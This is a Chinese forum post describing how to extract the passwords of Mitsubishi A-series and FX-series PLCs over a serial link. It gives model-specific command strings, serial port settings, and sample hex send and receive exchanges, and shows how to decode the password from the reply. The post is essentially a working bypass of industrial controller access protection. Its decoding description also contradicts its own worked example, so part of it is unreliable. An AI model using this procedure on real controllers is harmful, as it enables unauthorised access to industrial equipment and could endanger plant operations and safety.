1,使用串口调试器,设置好有关参数。
2,确定三菱PLC型号,根据PLC型号选择在串口调试器中输入对应字符串。
附:
PLC型号 对应字符串
FX2 \STX0700808\ETX6A
FX2N \STX0300808\ETX66
FX2_EPROM \STX0800808\ETX6B
FXON/FXOX \STX0800808\ETX6B
FX1N/FX1X \STX0800808\ETX6B
3、发送后在接收框中将显示一串字符串,如果你聪明的话一定会发现这些字符串的奥妙了。
(就是返回的密码)
如果看不出来的话,将这些字符串拷贝到 HEX格式 中,发送一次看看。(发送前记得先断开PLC)
建议你自己设置一个密码,然后用这个方法读取一次看看,以后就知道是怎么回事了。
密码字符:0-9,A-F。
4,举例说明破解A和FX系列PLC密码:
A系列:
发送:A2 07 00 FF 02 05 AE 00 08 C3
接收:0B 00 FF 02 00 AA 77 55 BB EF CD AB A4 00
密码:ABCDEF
发送:A2 07 00 FF 02 05 AE 00 08 C3
接收:0B 00 FF 02 00 AA 77 55 BB C1 B1 A1 A4
密码:A1B1C1
分析:密码为返回字符中BB至A4之间的字符,以每2字符为单位,从右往左读出。
FX系列:
设置串口:COM1,波特率:9600,数据位:7,校验:E偶,停止位:1
输入:EHX,显示:ASC
发送:
02 30 38 30 30 38 30 38 03 36 42
返回一串16进制的ASCII码,30为数字0,31为数字1,01为A,02为B,以此类推;
例:02 30 38 30 30 38 30 38 03 36 42
\STX4236353433323130\ETX41
密码是:B6543210 《42=B》
【必读】版权免责声明
1、本主题所有言论和内容纯属会员个人意见,与本论坛立场无关。2、本站对所发内容真实性、客观性、可用性不做任何保证也不负任何责任,网友之间仅出于学习目的进行交流。3、对提供的数字内容不拥有任何权利,其版权归原著者拥有。请勿将该数字内容进行商业交易、转载等行为,该内容只为学习所提供,使用后发生的一切问题与本站无关。 4、本网站不保证本站提供的下载资源的准确性、安全性和完整性;同时本网站也不承担用户因使用这些下载资源对自己和他人造成任何形式的损失或伤害。 5、本网站所有软件和资料均为网友推荐收集整理而来,仅供学习用途使用,请务必下载后两小时内删除,禁止商用。6、如有侵犯你版权的,请及时联系我们(电子邮箱1370723259@qq.com)指出,本站将立即改正。
| 
